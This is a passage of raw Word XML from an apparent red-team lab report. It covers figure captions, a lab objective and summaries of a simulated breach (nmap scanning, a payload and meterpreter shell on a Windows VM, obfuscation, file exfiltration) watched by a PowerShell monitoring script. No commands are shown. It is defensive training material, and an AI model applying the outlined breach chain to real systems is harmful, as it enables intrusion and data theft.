        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 Shows unified_monitor.ps1 file on windows vm</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32126 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F9E6E">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc29643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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows nmap results</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29643 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B09FD5">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc11724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3 Shows payload being sent to windows</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11724 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5944D">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc6013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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows payload successfully sent on windows</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6013 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF1EDE">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc2044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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows meterpreter shell being opened</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2044 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBFA122">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc4032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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows a file being downloaded from windows to kali</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4032 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="754ED800">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1761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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows commands for Test Evasion</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1761 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B1CB0">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc26533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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows a file being created and hosted on port 8080</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26533 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC32AB">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc24212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9 Shows file being accessed  and downloaded on windows</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24212 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD25EE1">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc11014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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows csv file of log for all the phases</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11014 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15859360">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc31517 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows windows PowerShell triggered logs</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31517 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000019">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List of Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001A"/>
    <w:p w14:paraId="1B59DD9B">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">TOC \f F \t "Heading 5" \h \c</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc4541 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows Tools and phases used</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4541 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C20B87">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754376E">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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc12213"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="34003468">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Simulate a realistic breach from reconnaissance to exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB9B97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Generate alerts in a centralized monitoring system (unified_alerts.csv) for Recon, Exploit, Evasion, and Exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720D16F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Test detection capability for unauthorized file transfers and PowerShell activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6B580">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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc13233"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Executive Summary &amp; Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="71A20958">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>This engagement simulated a full Red Team exercise using SMB shares, local file creation, and PowerShell to emulate exfiltration. Activities were monitored using a PowerShell-based unified detection script. Blue Team logs captured multiple events including scanning (Recon), file download (Exploit), obfuscated PowerShell commands (Evasion), and file copying (Exfil). The alerts confirmed that the monitoring system successfully logged all relevant activities. Partial evasion tests demonstrated that obfuscation is detectable with proper logging. The exercise validated the ability of a small-scale monitoring solution to detect core Red Team operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F25A47F">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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc23520"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Non-Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4C7F34F6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>This simulation tested the organization’s ability to detect unauthorized file access and data exfiltration. Using basic network discovery and PowerShell, test files were created and copied to monitored locations. Alerts were generated for scanning, suspicious file creation, and obfuscated command execution. The monitoring script (unified_monitor.ps1) successfully captured all activities, showing the organization can detect suspicious behavior. Partial evasion tests highlighted areas for improved PowerShell monitoring. Recommendations include continuous monitoring of file system activity, alerting for obfuscated scripts, and periodic simulated exercises. This ensures preparedness against real-world data theft and unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBEC831">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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc12189"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Engagement Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4A3BD7DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>A log script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> unified_monitor.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l "_APPENDIX A" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
